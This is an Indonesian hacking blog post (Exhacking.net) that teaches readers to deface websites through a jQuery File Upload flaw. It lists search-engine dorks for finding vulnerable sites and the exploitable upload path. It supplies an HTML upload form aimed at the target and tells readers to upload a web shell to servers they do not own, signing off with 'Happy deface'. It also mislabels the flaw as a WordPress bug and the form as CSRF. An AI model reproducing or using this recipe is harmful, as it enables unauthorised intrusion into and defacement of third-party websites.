26/05/16

Cara Deface dengan JQuery File Upload Vulnerability

Exhacking.net -  Kali ini ane akan menjelaskan bug atau celah pada salah satu web CMS Wordpress.
tapi gak semua web memiliki celah seperti ini ya ^^ langsung aja deh :D
Dork :
inurl:"assets/global/plugins/jquery-file-upload/" 
intext:"assets/global/plugins/jquery-file-upload/" 
inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"
Exploit : /assets/global/plugins/jquery-file-upload/server/php/
Jika Vuln maka tampilannya sama seperti "FormCraft" 
Lalu copy script CSRF ini :
<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Silahkan save di notepad atau apalah dengan format html, jangan lupa ganti bagian http://www.target.com dengan URL target kalian yang sudah di dapat dari dork tadi,
jika sudah selesai kalian tinggal buka dengan web browser dan penampakannya akan seperti ini
 
Selanjutnya tinggal kalian Upload shellnya,
Jika upload berhasil maka akan tampil nama shell kalian (contoh liat gambar di bawah), jika nama shell kalian tidak tampil,
ane saranin cari target lain ^_^

Happy deface ;)
sekian tutor kali ini , semoga bermanfaat.
kalo ada kesalahan ane mohon maaf ^^
Unknown
Unknown

I'm Just A Writer blogger usual And Happy to do some experiments And my dreams Want To Become A programmer and i love Linux.

Tidak ada komentar:

Posting Komentar

Silahkan berkomentar jika ada yang ingin di tanyakan 😊